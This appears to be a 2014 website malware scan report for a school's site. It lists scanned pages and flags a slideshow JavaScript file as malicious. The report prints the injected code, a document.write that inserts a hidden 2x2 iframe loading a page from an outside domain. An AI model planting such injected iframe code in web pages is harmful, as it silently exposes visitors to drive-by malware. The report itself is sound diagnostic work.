Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kkw-engschool.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kkw-engschool.com/ | 200 OK Content-Length: 10309 Content-Type: text/html | clean |
http://kkw-engschool.com/Home.aspx | 200 OK Content-Length: 13076 Content-Type: text/html | clean |
http://kkw-engschool.com/js/image-slideshow-5.js | 200 OK Content-Length: 7519 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=564452></iframe>');
var opacitySpeed = 2; var opacitySteps = 10; var slideSpeed = 5; var slideSteps = 8; var columnsOfThumbnails = 4; var DHTMLgoodies_largeImage = false; var DHTMLgoodies_imageToShow = false; var DHTMLgoodies_currentOpacity = 100; var DHTMLgoodies_s setOpacity(); DHTMLgoodies_largeImage.src = DHTMLgoodies_imageToShow; speed=opacitySteps; } if(DHTMLgoodies_currentOpacity>=99 && speed>0)DHTMLgoodies_currentOpacity=99; setOpacity(); if(DHTMLgoodies_currentOpacity>=99 && speed>0)return; if(uniqueId==currentUnqiueOpacityId)setTimeout('moveOpacity(' + speed + ',' + uniqueId + ')',opacitySpeed); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://avonleephotography.com/zaaf.html?j=564452 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://avonleephotography.com/zaaf.html?j=564452> | ||
http://kkw-engschool.com/Aboutus.aspx | 200 OK Content-Length: 12071 Content-Type: text/html | clean |
http://kkw-engschool.com/aboutuskk.aspx | 200 OK Content-Length: 12091 Content-Type: text/html | clean |
http://kkw-engschool.com/BoardofD.aspx | 200 OK Content-Length: 25827 Content-Type: text/html | clean |
http://kkw-engschool.com/pri_HMdesk.aspx | 200 OK Content-Length: 12314 Content-Type: text/html | clean |
http://kkw-engschool.com/Staff.aspx | 200 OK Content-Length: 11901 Content-Type: text/html | clean |
http://kkw-engschool.com/exams.aspx | 200 OK Content-Length: 10327 Content-Type: text/html | clean |
http://kkw-engschool.com/strength.aspx | 200 OK Content-Length: 10327 Content-Type: text/html | clean |
http://kkw-engschool.com/facility.aspx | 200 OK Content-Length: 11936 Content-Type: text/html | clean |
http://kkw-engschool.com/activities.aspx | 200 OK Content-Length: 14470 Content-Type: text/html | clean |
http://kkw-engschool.com/photogallary.aspx | 200 OK Content-Length: 10827 Content-Type: text/html | clean |
http://kkw-engschool.com/pre.aspx | 200 OK Content-Length: 9399 Content-Type: text/html | clean |
http://kkw-engschool.com/PTA.aspx | 200 OK Content-Length: 9820 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kkw-engschool.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 12 May 2014 00:20:53 GMT
Server: Microsoft-IIS/7.5
Content-Length: 10309
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...10309 bytes of data.
GET / HTTP/1.1
Host: kkw-engschool.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 12 May 2014 00:20:53 GMT
Server: Microsoft-IIS/7.5
Content-Length: 10309
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...10309 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kkw-engschool.com
Referer: http://www.google.com/search?q=kkw-engschool.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kkw-engschool.com
Referer: http://www.google.com/search?q=kkw-engschool.com
Result:
The result is similar to the first query. There are no suspicious redirects found.